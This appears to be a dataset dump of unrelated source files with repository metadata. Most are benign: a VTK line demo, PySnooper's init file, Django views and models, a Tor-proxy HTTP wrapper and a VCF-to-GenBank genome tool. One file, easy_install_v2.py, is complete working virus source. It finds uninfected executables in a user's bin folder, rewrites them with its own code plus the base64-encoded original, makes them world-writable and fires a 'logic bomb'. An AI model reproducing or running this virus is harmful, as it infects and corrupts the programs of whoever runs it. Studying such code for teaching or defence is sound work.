# line = vtk.vtkLine()
# line.GetPointIds().SetId(0, i)
# line.GetPointIds().SetId(1, i + 1)
# lines.InsertNextCell(line)
line = vtk.vtkLine() # 默认为2个端点,
# print(line.GetPointIds())
# line.GetPointIds().SetNumberOfIds(4) # 可以设置为N个端点
line.GetPointIds().SetId(0, 0) # SetId第一个参数为端点ID, 第二个参数为点的ID
line.GetPointIds().SetId(1, 1)
lines.InsertNextCell(line)
line.GetPointIds().SetId(0, 1)
line.GetPointIds().SetId(1, 4)
# line.GetPointIds().SetId(2, 4)
lines.InsertNextCell(line)
# Create a polydata to store everything in
linesPolyData = vtk.vtkPolyData()
# Add the points to the dataset geometry
linesPolyData.SetPoints(points)
# Add the lines to the dataset topology
linesPolyData.SetLines(lines)
# Setup actor and mapper
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(linesPolyData)
return mapper
def main():
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.SetWindowName("Line")
renderWindow.AddRenderer(renderer)
renderWindowInteractor = vtk.vtkRenderWindowInteractor()
renderWindowInteractor.SetRenderWindow(renderWindow)
# Visualize
colors = vtk.vtkNamedColors()
renderer.SetBackground(colors.GetColor3d("Silver"))
actor = vtk.vtkActor()
# The first way
# actor.SetMapper(createLine1())
# The second way
# actor.SetMapper(createLine2())
# The third way
actor.SetMapper(createLine3())
actor.GetProperty().SetLineWidth(4)
actor.GetProperty().SetColor(colors.GetColor3d("Peacock"))
renderer.AddActor(actor)
renderWindow.Render()
renderWindowInteractor.Start()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
18eaf4480da5398f037854fd148de9adc33abbe1 | d8940b6d45c15a84c8ee1ab298c4df8a905f956c | /pysnooper/__init__.py | 4b6ea5bc1ee65f9e361836555c20c181a5e8e0ff | [
"MIT"
] | permissive | Karanxa/PySnooper | f179c3e23627979c3a58664b966c9ae4cfa522a2 | 22f63ae09bb6d63de86496d613815ee03d191b75 | refs/heads/master | 2023-05-27T14:23:00.604201 | 2021-06-11T15:06:55 | 2021-06-11T15:06:55 | 376,061,317 | 1 | 0 | MIT | 2021-06-11T15:06:55 | 2021-06-11T15:04:02 | null | UTF-8 | Python | false | false | 812 | py | # Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
'''
PySnooper - Never use print for debugging again
Usage:
import pysnooper
@pysnooper.snoop()
def your_function(x):
...
A log will be written to stderr showing the lines executed and variables
changed in the decorated function.
For more information, see https://github.com/cool-RR/PySnooper
'''
from .tracer import Tracer as snoop
from .variables import Attrs, Exploding, Indices, Keys
import collections
__VersionInfo = collections.namedtuple('VersionInfo',
('major', 'minor', 'micro'))
__version__ = '0.5.0'
__version_info__ = __VersionInfo(*(map(int, __version__.split('.'))))
del collections, __VersionInfo # Avoid polluting the namespace
| [
"[email protected]"
] | |
6017f8bc5e80a39ea78cc67cbc7474a53ad39874 | 4d259f441632f5c45b94e8d816fc31a4f022af3c | /tornado/mongodb/client.py | df52fa27df3ea41b18e3d682e2bcf182a9f48e30 | [] | no_license | xiaoruiguo/lab | c37224fd4eb604aa2b39fe18ba64e93b7159a1eb | ec99f51b498244c414b025d7dae91fdad2f8ef46 | refs/heads/master | 2020-05-25T01:37:42.070770 | 2016-05-16T23:24:26 | 2016-05-16T23:24:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,204 | py | import httplib2
from urllib import urlencode
h = httplib2.Http()
## Add articles
data = {'id':'1', 'author':'B', 'genre':'comedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'1', 'author':'C', 'genre':'comedys'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'2', 'author':'A', 'genre':'tragedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'3', 'author':'X', 'genre':'tragedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
## View all articles
content, response = h.request("http://127.0.0.1:8888/articles", "GET")
print '------- all articles -------'
print response
## View articles
print '------- per articles -------'
data = {"articleid":1}
data = urlencode(data)
content, response = h.request("http://127.0.0.1:8888/articles"+ "?" + data, "GET")
#for res in response:
# print res
print response
## Delete articles
#content, response = h.request("http://127.0.0.1:8888/articles", "DELETE")
#content, response = h.request("http://127.0.0.1:8888/articles", "GET")
#print response
| [
"[email protected]"
] | |
3a0f200b06d77ef08f908fd0474fe8e95f74cb21 | b68fea9d645de59ee31da970d3dc435460fde9de | /discussboard/views_edit.py | a7cc8324343a334ab42398e43c09249b9d270868 | [
"BSD-3-Clause"
] | permissive | shagun30/djambala-2 | 03fde4d1a5b2a17fce1b44f63a489c30d0d9c028 | 06f14e3dd237d7ebf535c62172cfe238c3934f4d | refs/heads/master | 2021-01-10T04:20:30.735479 | 2008-05-22T05:02:08 | 2008-05-22T05:02:08 | 54,959,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,026 | py | # -*- coding: utf-8 -*-
"""
/dms/discussboard/views_edit.py
.. enthaelt den View zum Aendern der Eigenschaften des Diskussionsforums
Django content Management System
Hans Rauch
[email protected]
Die Programme des dms-Systems koennen frei genutzt und den spezifischen
Beduerfnissen entsprechend angepasst werden.
0.02 21.05.2008 get_role_choices
0.01 12.07.2007 Beginn der Arbeit
"""
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django import newforms as forms
from django.db import transaction
from django.utils.translation import ugettext as _
from dms.queries import get_site_url
from dms.roles import *
from dms.utils import get_tabbed_form
from dms.utils import info_slot_to_header
from dms.utils import get_parent_section_choices
from dms.utils import remove_link_icons
from dms.utils import get_choices_new_protected
from dms.utils_form import get_folderish_vars_edit
from dms.encode_decode import decode_html
from dms.discussboard.utils import get_dont
from dms.discussboard.help_form import help_form
from dms_ext.extension import * # dms-Funktionen ueberschreiben
# -----------------------------------------------------
@require_permission('perm_edit_folderish')
def discussboard_edit(request, item_container):
""" Eigenschaften des Ordners aendern """
params = request.GET.copy()
profi_mode = params.has_key('profi')
@transaction.commit_manually
def save_values(item_container, old, new):
""" Abspeichern der geaenderten Werte """
item_container.container.save_values(old, new)
item_container.item.save_values(old, new)
item_container.save_modified_values(old, new)
transaction.commit()
class dms_itemForm ( forms.Form ) :
title = forms.CharField(max_length=240,
widget=forms.TextInput(attrs={'size':60}) )
nav_title = forms.CharField(max_length=60,
widget=forms.TextInput(attrs={'size':30}) )
sub_title = forms.CharField(required=False, max_length=240,
widget=forms.TextInput(attrs={'size':60}) )
text = forms.CharField(required=False,
widget=forms.Textarea(attrs={'rows':5, 'cols':60, 'id':'ta',
'style':'width:100%;'}) )
text_more = forms.CharField(required=False,
widget=forms.Textarea(attrs={'rows':10, 'cols':60, 'id':'ta1',
'style':'width:100%;'}) )
image_url = forms.CharField(required=False, max_length=200,
widget=forms.TextInput(attrs={'size':60}) )
image_url_url = forms.URLField(required=False, max_length=200,
widget=forms.TextInput(attrs={'size':60}) )
image_extern = forms.BooleanField(required=False)
is_wide = forms.BooleanField(required=False)
is_important = forms.BooleanField(required=False)
if profi_mode:
info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
attrs={'rows':10, 'cols':60, 'style':'width:100%;'}) )
else:
info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
attrs={'rows':10, 'cols':60, 'id':'ta2', 'style':'width:100%;'}) )
section = forms.CharField(required=False,
widget=forms.Select(choices=get_parent_section_choices(item_container),
attrs={'size':4, 'style':'width:40%'} ) )
has_user_support = forms.BooleanField(required=False)
has_comments = forms.BooleanField(required=False)
is_moderated = forms.BooleanField(required=False)
is_browseable = forms.BooleanField(required=False)
visible_start = forms.DateField(input_formats=['%d.%m.%Y'],
widget=forms.TextInput(attrs={'size':10}))
visible_end = forms.DateField(input_formats=['%d.%m.%Y'],
widget=forms.TextInput(attrs={'size':10}))
show_next = forms.BooleanField(required=False)
integer_4 = forms.ChoiceField(choices=get_choices_new_protected(), widget=forms.RadioSelect() )
app_name = 'discussboard'
my_title = _(u'Diskussionsforum ändern')
data_init = {
'title' : decode_html(item_container.item.title),
'nav_title' : decode_html(item_container.container.nav_title),
'sub_title' : item_container.item.sub_title,
'text' : remove_link_icons(item_container.item.text),
'text_more' : remove_link_icons(item_container.item.text_more),
'image_url' : item_container.item.image_url,
'image_url_url' : item_container.item.image_url_url,
'image_extern' : item_container.item.image_extern,
'is_wide' : item_container.item.is_wide,
'is_important' : item_container.item.is_important,
'info_slot_right' : info_slot_to_header(item_container.item.info_slot_right),
'section' : decode_html(item_container.section),
'has_comments' : item_container.item.has_comments,
'has_user_support': item_container.item.has_user_support,
'is_moderated' : item_container.item.is_moderated,
'is_browseable' : item_container.is_browseable,
'visible_start' : item_container.visible_start,
'visible_end' : item_container.visible_end,
'integer_4' : item_container.item.integer_4
}
if request.method == 'POST' :
data = request.POST.copy ()
else :
data = data_init
f = dms_itemForm ( data )
# --- Reihenfolge, Ueberschriften, Hilfetexte // Sonderfall: Startseite
tabs = [
('tab_base' , ['title', 'sub_title', 'nav_title', 'section', ]),
('tab_intro' , ['text', 'text_more', 'image_url', 'image_url_url', 'image_extern',
'is_wide', 'is_important']),
('tab_user_support', ['has_user_support', 'integer_4', 'is_moderated', 'has_comments']),
('tab_frame' , ['info_slot_right',]),
('tab_visibility', ['is_browseable', 'visible_start', 'visible_end',]),
]
content = get_tabbed_form(tabs, help_form, app_name ,f)
if request.method == 'POST' and not f.errors :
save_values(item_container, data_init, f.data)
return HttpResponseRedirect(get_site_url(item_container, 'index.html'))
else :
vars = get_folderish_vars_edit(request, item_container, app_name, my_title, content, f, get_dont())
return render_to_response ( 'app/base_edit.html', vars )
| [
"[email protected]"
] | |
99cc6f137b9f513dd32357037e6f41e2231fad35 | 920b9cb23d3883dcc93b1682adfee83099fee826 | /itsm/project/models/base.py | 747edf57e059aed9c831fc4991b3f24c7f758c0a | [
"MIT",
"LGPL-2.1-or-later",
"LGPL-3.0-only"
] | permissive | TencentBlueKing/bk-itsm | f817fb166248d3059857b57d03e8b5ec1b78ff5b | 2d708bd0d869d391456e0fb8d644af3b9f031acf | refs/heads/master | 2023-08-31T23:42:32.275836 | 2023-08-22T08:17:54 | 2023-08-22T08:17:54 | 391,839,825 | 100 | 86 | MIT | 2023-09-14T08:24:54 | 2021-08-02T06:35:16 | Python | UTF-8 | Python | false | false | 2,045 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-ITSM 蓝鲸流程服务 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-ITSM 蓝鲸流程服务 is licensed under the MIT License.
License for BK-ITSM 蓝鲸流程服务:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from django.db import models
from django.utils.translation import ugettext as _
from itsm.component.constants import LEN_NORMAL
class Model(models.Model):
FIELDS = ('creator', 'create_at', 'updated_by', 'update_at')
creator = models.CharField(_("创建人"), max_length=LEN_NORMAL, null=True, blank=True)
create_at = models.DateTimeField(_("创建时间"), auto_now_add=True)
update_at = models.DateTimeField(_("更新时间"), auto_now=True)
updated_by = models.CharField(_("修改人"), max_length=LEN_NORMAL, null=True, blank=True)
class Meta:
app_label = 'project'
abstract = True
| [
"[email protected]"
] | |
7faacb9fdcd5f1ce0dc6e1a0c84d359a98b04453 | 3f2d56b2191e0aa0b9bae2f6023deee9f2f444be | /Libs_et_Modules/easy_install_v2.py | 732f9124122e336aff75fb51dd532bace00f6510 | [] | no_license | goffinet/GLMF201 | 8c5a11c7d4a631a95098ae00bc9509929df0a7ca | 0213ca0fe8cb7bdbee54a128788a7d079394afcb | refs/heads/master | 2021-01-21T11:22:50.099598 | 2017-01-18T14:00:14 | 2017-01-18T14:00:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,566 | py | #!/usr/bin/python3
# === INFECTED ===
import os
from sys import argv
import stat
import random
import base64
import tempfile
cmd_init, cmd = ('ls', 'ls')
pathToCorrupt = '/home/tristan/my_bin/'
fileToCorrupt = pathToCorrupt + cmd
def isInfected(content):
return content == b'# === INFECTED ===\n'
def bomb():
print('BEAAAAAAAAAAH!')
with open(fileToCorrupt, 'rb') as currentFile:
ftcLines = currentFile.readlines()
if isInfected(ftcLines[1]):
filenames = os.listdir(pathToCorrupt)
random.shuffle(filenames)
for cmd in filenames:
if cmd != cmd_init:
with open(pathToCorrupt + cmd, 'rb') as newFile:
ftcLines = newFile.readlines()
if not isInfected(ftcLines[1]):
fileToCorrupt = pathToCorrupt + cmd
break
else:
print('All files already corrupted!')
exit(0)
# ftcLines contient le code binaire du programme
ftcLines = b''.join(ftcLines)
# On détermine où se trouve le code exécutable original
with open(argv[0], 'rb') as currentFile:
content = currentFile.readlines()
startOrigin = False
original = None
virus = []
for i in range(len(content)):
if startOrigin:
original = content[i][2:]
else:
virus.append(content[i])
if content[i] == b'# === ORIGINAL ===\n':
startOrigin = True
# virus contient le virus
# original contient le code binaire original
# On efface l'exécutable, on écrit le code Python et on colle le code binaire
print('Infection in progress : command', cmd)
os.remove(fileToCorrupt)
with open(fileToCorrupt, 'wb') as currentFile:
for line in virus:
currentFile.write(line)
currentFile.write(b'# ' + base64.b64encode(ftcLines))
os.chmod(fileToCorrupt, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
# Bombe logique
bomb()
# Exécution du code original
try:
if argv[0] != './easy_install_v2.py':
if original is None:
original = ftcLines
temp = tempfile.NamedTemporaryFile(delete=True)
with open(temp.name, 'wb') as tmpCmdFile:
tmpCmdFile.write(base64.b64decode(original))
os.chmod(temp.name, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
temp.file.close()
os.system(temp.name +' ' + ' '.join(argv[1:]))
except:
exit(2)
# === ORIGINAL ===
| [
"[email protected]"
] | |
6da13e87abfd10017f1f682867f5f982147bbccc | f8ff25224bf827406c65560e247e7c3c064cdd38 | /convert_savedmodel_keras_tflite.py | a64597fe955a1644762330369f48a47086e88b20 | [] | no_license | akinoriosamura/PFLD | 893cadbbdc8a7ef424327c814196e1e3608f937f | b3f3c74369c1a8dc4dc0d2e5266dd2b473dfd582 | refs/heads/master | 2021-06-17T15:06:05.468485 | 2020-12-10T09:39:08 | 2020-12-10T09:39:08 | 211,257,866 | 0 | 0 | null | 2019-09-27T07:09:04 | 2019-09-27T07:09:03 | null | UTF-8 | Python | false | false | 468 | py | import tensorflow as tf
# Load the saved keras model back.
k_model = tf.keras.models.load_model(
"SavedModelPre",
custom_objects=None,
compile=True
)
# k_model = tf.keras.experimental.load_from_saved_model("SavedModelPre")
k_model.summary()
k_model.save('model.h5', include_optimizer=False)
converter = tf.lite.TFLiteConverter.from_keras_model_file("model.h5")
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)
| [
"[email protected]"
] | |
deb4be375223c47ca23cf76acf8592ff12a33e4b | 6430d2572c4d6dfe41e0e30e725271444cc6f675 | /torsurvey/torapi.py | 6a8d9874f0eeda2ccf1457658601340cd0f124c6 | [] | no_license | nikcub/torsurvey | 5a0c36560801862d5cf1c74f362ae013e0458f27 | 6e9ce5793694857dd5c451905a4a7aa773bfd2b6 | refs/heads/master | 2016-09-05T10:47:13.578465 | 2015-01-27T15:37:07 | 2015-01-27T15:37:07 | 26,388,609 | 1 | 1 | null | 2015-01-27T15:37:07 | 2014-11-09T07:18:27 | Python | UTF-8 | Python | false | false | 1,580 | py | #!/usr/bin/env python
"""
torsurvey.torapi
"""
import requesocks as requests
import requesocks.exceptions
# import hmac
# import hashlib
# import json
import logging
# from time import time
class TorAPI(object):
headers = {
'User-Agent' : 'torsurvey-',
}
tor_host = None
tor_port = None
proxy_tor = {
"http": "socks5://127.0.0.1:9030",
"https": "socks5://127.0.0.1:9030"
}
def __init__(self, proxy_host='127.0.0.1', proxy_port='9040', proxy_type='socks5', timeout=10):
self.proxy_host = proxy_host
self.proxy_port = proxy_port
self.proxy_type = proxy_type
self.timeout = timeout
self.proxy = {}
self.proxy['http'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
self.proxy['https'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
self.session = requesocks.session()
self.session.proxies = self.proxy
logging.debug("Established session with proxies %s" % str(self.proxy))
def get_ip(self):
r = self.req('http://ifconfig.me/ip')
if r.status_code == 200:
return r.text
return 'Error'
def get_headers(self):
headers = self.headers
# @TODO add headers
return headers
def req(self, url, extras={}):
try:
r = self.session.request('GET', url, allow_redirects=True, timeout=self.timeout, headers=self.headers)
return r
except requesocks.exceptions.ConnectionError, e:
logging.error("Bad connection cannot connect to %s" % url)
return -1
except Exception, e:
logging.error("%s: %s" % (url, e))
return -1
| [
"[email protected]"
] | |
ae07df2f81bfe910c4ffcfe06f600297235bb252 | c822c6a8941cda6b31b9505372f02b528fed8767 | /pledge/manage.py | 4a5058efe7eab9d9020ac60938e874aef65b13ca | [] | no_license | asim3/kfupm-pledge | b39944c87032325890a1c80ac602bbb12a7e7f58 | 6108a067b225aeeaaff7d82c616099ef5820b3ca | refs/heads/main | 2023-03-08T04:33:28.801450 | 2021-02-17T10:09:45 | 2021-02-17T10:09:45 | 319,908,595 | 0 | 0 | null | 2020-12-19T21:05:44 | 2020-12-09T09:38:57 | Python | UTF-8 | Python | false | false | 662 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pledge.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
2e35a7f0f323931f6f815ef376f0ecbb345c6106 | 19acbc03360d373071a4ddb74855b7087e074089 | /contents/vcf_to_genbank.py | b19dd134ec896769bf2ddcb7d0b86bd81b84afd8 | [] | no_license | glebkuznetsov/recoli_c321d_genome_annotation | 5452d5418e52374c429ac974150f5d0e27e11a93 | 25f3caba9d62f7741cebcdbb3eeefd831f703f2b | refs/heads/master | 2021-05-28T01:11:27.200718 | 2014-12-01T06:13:00 | 2014-12-01T06:13:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51,947 | py | """
Methods for impressing the changes in a VCF file onto an existing
Genbank file.
NOTES:
* Look into insertion annotations being 1 off (specifically galk insertion at SIR.30.31i
* Annotation of deletion d_mg1655_66564_66733 partial deletion of repeat region 66564 66733 seems to be one off.
"""
import copy
import csv
import os
import pickle
from Bio import SeqIO
from Bio.SeqFeature import FeatureLocation
from Bio.SeqFeature import SeqFeature
from Bio.SeqRecord import SeqRecord
import vcf
from biopython_util import add_feature_to_seq_record
from biopython_util import delete_interval
from biopython_util import insert_sequence_and_update_features
from refactor_config import GENOMES_DIR
###############################################################################
# File locations
###############################################################################
REC1_C321D_ROOT = os.path.join(GENOMES_DIR, 'rec1_c321d')
###############################################################################
# Constants
###############################################################################
VARIANT_ANNOTATION_TYPE = 'variation'
MAX_REPLACE_CHARS = 12
###############################################################################
# Helper objects used by the main procedure
###############################################################################
class RuntimeLiftover(object):
"""Object that aids in dynamically updating a genome record with a list of
positions that are relative to the original genome record.
An example of a case where this is useful is when you are creating a
mapping from a vcf record which shows SNPs and other variants relative
to a reference genome.
For example, say you have two insertions:
* A - position: 100, size: 3
* B - position: 200, size: 4
When we introduce the first insertion, the frame of the underlying genome
has shifted, so that the second insertion should really be added at
position 200 + 3.
"""
def __init__(self, original_genome_record):
"""Constructor.
"""
# The original record. This remains unchanged throughout the
# mapping process.
# TODO: Do we even need to be keeping track of this? Or are intervals
# sufficient?
self.source_genome_record = original_genome_record
# Structure that maintains the mapping of intervals.
# Let's say we guarantee that it's sorted and exclusive, for now.
# NOTE: Each interval maintains a one-to-one mapping and so is
# inclusive bounds on both ends.
self._interval_mapping = self._initialize_interval_mapping()
def _initialize_interval_mapping(self):
"""Initializes the interval mapping.
"""
# The initial mapping is a list with a single element, which is
# a pair of tuples representing the correspondence between the original
# whole sequence interval and a copy of itself.
original_interval = (0, len(self.source_genome_record) - 1)
initial_mapping_pair = (original_interval, copy.copy(original_interval))
return [initial_mapping_pair]
@classmethod
def from_pickled_intervals(cls, original_genome_record, pickle_dest):
"""Factory method that creates a RuntimeLiftover object and sets
the intervals from a pickle file.
The original genome record still has to be provided.
"""
runtime_liftover = cls(original_genome_record)
with open(pickle_dest) as pickle_fh:
runtime_liftover._interval_mapping = pickle.load(pickle_fh)
return runtime_liftover
def pickle_interval_mapping(self, pickle_dest):
"""Pickle the interval mapping and write to file.
This is useful for debugging intervals and developing other output
formats.
"""
with open(pickle_dest, 'w') as pickle_fh:
pickle.dump(self._interval_mapping, pickle_fh)
def write_chain_file(self, chain_file_dest):
"""Writes the current state of _interval_mapping in the UCSC
liftover chain file format.
See: http://genome.ucsc.edu/goldenPath/help/chain.html
"""
with open(chain_file_dest, 'w') as chain_file_fh:
# Write the heading.
chain_file_fh.write('chain\n')
# Each row is of the form 'size dt dq', separated by spaces.
# * size: the size of the ungapped alignment
# * dt: the difference between the end of this block and the
# beginning of the next block (reference sequence)
# * dq: the difference between the end of this block and the
# beginning of the next block (query sequence)
# NOTE: The last line of the alignment section contains only one
# number: the ungapped alignment size of the last block.
interval_index = 0
num_interval_mappings = len(self._interval_mapping)
for interval_index in range(num_interval_mappings):
# I am using the names '*reference*' and '*query*' in the sense
# that the chain file uses them, where query sequence is the one
# whose coordinates we are generally trying to convert into the
# frame of the target. Typically the query sequence is the one
# we mapped the VCF changes on top of.
(current_reference_interval, current_query_interval) = (
self._interval_mapping[interval_index])
size = bases_in_interval(current_reference_interval)
next_interval_index = interval_index + 1
if next_interval_index < num_interval_mappings:
(next_reference_interval, next_query_interval) = (
self._interval_mapping[next_interval_index])
dt = (next_reference_interval[0] -
current_reference_interval[1] - 1)
dq = (next_query_interval[0] -
current_query_interval[1] - 1)
chain_file_fh.write('%d %d %d\n' % (size, dt, dq))
else:
# This is the last line. Just write the block size.
chain_file_fh.write('%d\n' % (size,))
def convert_source_position_to_target(self, source_position, or_next=False):
"""Converts a single position in the source genome to the corresponding
position in the target genome (the one being updated).
Args:
source_position: Position in the source genome. (0-indexed).
or_next: If True, when no direct mapping, return the next position.
Returns:
The position in the target genome, or None if mapping failed.
"""
assert isinstance(source_position, int), "source_position must be int."
# For now, the algorithm is to first search every interval in the
# internal interval mapping data structure until we find the one that
# the source position lies in, and then find the corresponding target
# position by using the relative offset of the source position within
# the interval.
for mapping_index in xrange(len(self._interval_mapping)):
source_interval, target_interval = self._interval_mapping[
mapping_index]
if source_interval[0] <= source_position <= source_interval[1]:
interval_index = source_position - source_interval[0]
return target_interval[0] + interval_index
if or_next and source_position < source_interval[0]:
return self.convert_source_position_to_target(
source_interval[0], or_next=or_next)
return None
def convert_target_position_to_source(self, target_position):
"""Converts a single position in the target genome to the corresponding
position in the source genome (the one being updated).
Similar, but more limited than convert_source_position_to_target().
Args:
target_position: Position in the target genome. (0-indexed).
Returns:
The position in the source genome, or None if mapping failed.
"""
assert isinstance(target_position, int), "target_position must be int."
for mapping_index in xrange(len(self._interval_mapping)):
source_interval, target_interval = self._interval_mapping[
mapping_index]
if target_interval[0] <= target_position <= target_interval[1]:
interval_index = target_position - target_interval[0]
return source_interval[0] + interval_index
return None
def handle_insertion(self, variant_data):
"""Handles an insertion with the given data spec.
"""
# Create a new interval mapping and replace the member attribute
# at the end.
new_interval_mapping = []
# Parse the insert data object.
insert_position = variant_data['position']
insert_sequence = variant_data['sequence']
len_insert_sequence = len(insert_sequence)
# We use a state machine strategy to first find the interval
# to insert, and then update all downstream target intervals.
STATE_SEARCHING = 'SEARCHING'
STATE_UPDATING_TARGET_DOWNSTREAM = 'UPDATING_TARGET_DOWNSTREAM'
state = STATE_SEARCHING
for idx, (source_interval, target_interval) in enumerate(
self._interval_mapping):
if state == STATE_SEARCHING:
if source_interval[0] <= insert_position <= source_interval[1]:
insert_position_index = insert_position - source_interval[0]
# The source simply gets split.
new_source_interval_upstream = (source_interval[0],
insert_position - 1)
new_source_interval_downstream = (insert_position,
source_interval[1])
# The target gets split, with the downstream interval
# shifted by the size of the insertion sequence.
new_target_interval_upstream = (target_interval[0],
target_interval[0] + insert_position_index - 1)
new_target_interval_downstream = (target_interval[0] +
insert_position_index + len_insert_sequence,
target_interval[1] + len_insert_sequence)
# Append the split sequence pairs.
new_interval_mapping.append((new_source_interval_upstream,
new_target_interval_upstream))
new_interval_mapping.append((new_source_interval_downstream,
new_target_interval_downstream))
# Update the state for remaining iterations.
state = STATE_UPDATING_TARGET_DOWNSTREAM
elif insert_position < source_interval[0]:
# The insert_position was deleted. Shift the target
# interval downstream by the size of the insertion.
new_source_interval = (
source_interval[0],
source_interval[1])
new_target_interval = (
target_interval[0] + len(insert_sequence),
target_interval[1] + len(insert_sequence))
assert (bases_in_interval(new_source_interval) ==
bases_in_interval(new_target_interval))
new_interval_mapping.append((new_source_interval,
new_target_interval))
state = STATE_UPDATING_TARGET_DOWNSTREAM
else:
new_interval_mapping.append(
(source_interval, target_interval))
else:
# Shift all remaining target intervals.
new_target_interval = (
target_interval[0] + len_insert_sequence,
target_interval[1] + len_insert_sequence)
new_interval_mapping.append((source_interval,
new_target_interval))
if state == STATE_SEARCHING:
raise RuntimeError("Error updating RuntimeLiftover with %s", (
str(variant_data,)))
self._interval_mapping = new_interval_mapping
def handle_deletion(self, variant_data):
"""Handles a deletion with the given data spec.
Args:
variant_data: Dictionary with keys:
* interval: A two-tuple representing pythonic interval for the
deletion, i.e. (inclusive_start, exclusive_end).
e.g. (100, 102) is a deletion of the 2 bases at positions
100 and 101. Relative to the source genome.
"""
interval = variant_data['interval']
for source_position in range(*interval):
delete_position = self.convert_source_position_to_target(
source_position, or_next=True)
delete_position = interval[0]
delete_interval_size = 1
# Create a new interval mapping and replace the member attribute
# at the end.
new_interval_mapping = []
# We use a state machine strategy to first find the interval
# to delete, and then update all downstream target intervals.
STATE_SEARCHING = 'SEARCHING'
STATE_UPDATING_TARGET_DOWNSTREAM = 'UPDATING_TARGET_DOWNSTREAM'
state = STATE_SEARCHING
for source_interval, target_interval in self._interval_mapping:
if state == STATE_SEARCHING:
if source_interval[0] <= delete_position <= source_interval[1]:
delete_position_index = delete_position - source_interval[0]
# The source simply gets split, dropping a base.
new_source_interval_upstream = (source_interval[0],
delete_position - 1)
new_source_interval_downstream = (
delete_position + delete_interval_size,
source_interval[1])
# The target gets split, including the position, but
# reducing the size of this and all following intervals.
new_target_interval_upstream = (target_interval[0],
target_interval[0] + delete_position_index - 1)
new_target_interval_downstream = (
target_interval[0] + delete_position_index,
target_interval[1] - delete_interval_size)
# Append the split sequence pairs.
new_interval_mapping.append((new_source_interval_upstream,
new_target_interval_upstream))
new_interval_mapping.append((new_source_interval_downstream,
new_target_interval_downstream))
# Update the state for remaining iterations.
state = STATE_UPDATING_TARGET_DOWNSTREAM
elif delete_position < source_interval[0]:
# The interval this delete_position would have fallen
# into has been deleted, effectively delete the first
# position in this current interval.
new_source_interval = (source_interval[0] + 1,
source_interval[1])
new_target_interval = (target_interval[0],
target_interval[1] - 1)
new_interval_mapping.append((new_source_interval,
new_target_interval))
state = STATE_UPDATING_TARGET_DOWNSTREAM
else:
new_interval_mapping.append(
(source_interval, target_interval))
else: # state == STATE_UPDATING_TARGET_DOWNSTREAM
# Shift all remaining target intervals.
new_target_interval = (
target_interval[0] - delete_interval_size,
target_interval[1] - delete_interval_size)
new_interval_mapping.append(
(source_interval, new_target_interval))
if state == STATE_SEARCHING:
raise RuntimeError("Error updating RuntimeLiftover for %s" % (
str(variant_data,)))
self._interval_mapping = new_interval_mapping
def bases_in_interval(interval):
"""Returns the number of bases in the liftover interval.
These are inclusive on both ends, not Pythonic that is.
"""
return interval[1] - interval[0] + 1
class VCFToGenbankMaker(object):
"""Object that encapsulates the logic for updating a genbank file
with changes from a vcf file.
Usage:
1. Construct an instance according to the constructor signature.
2. Call run().
"""
def __init__(self, genome_record, vcf_path, sample_id,
manual_updates_filepath=None):
"""Constructor.
"""
# Keep a copy of the original genome record.
self.original_genome_record = copy.deepcopy(genome_record)
# The record that is mutated as we progress.
self.genome_record = genome_record
# Save the path to the vcf. We'll use the vcf.Reader stream reader
# object when we actually need to handle it.
self.vcf_path = vcf_path
# The specific sample in the vcf.
self.sample_id = sample_id
# Location with manual updates. Might be None.
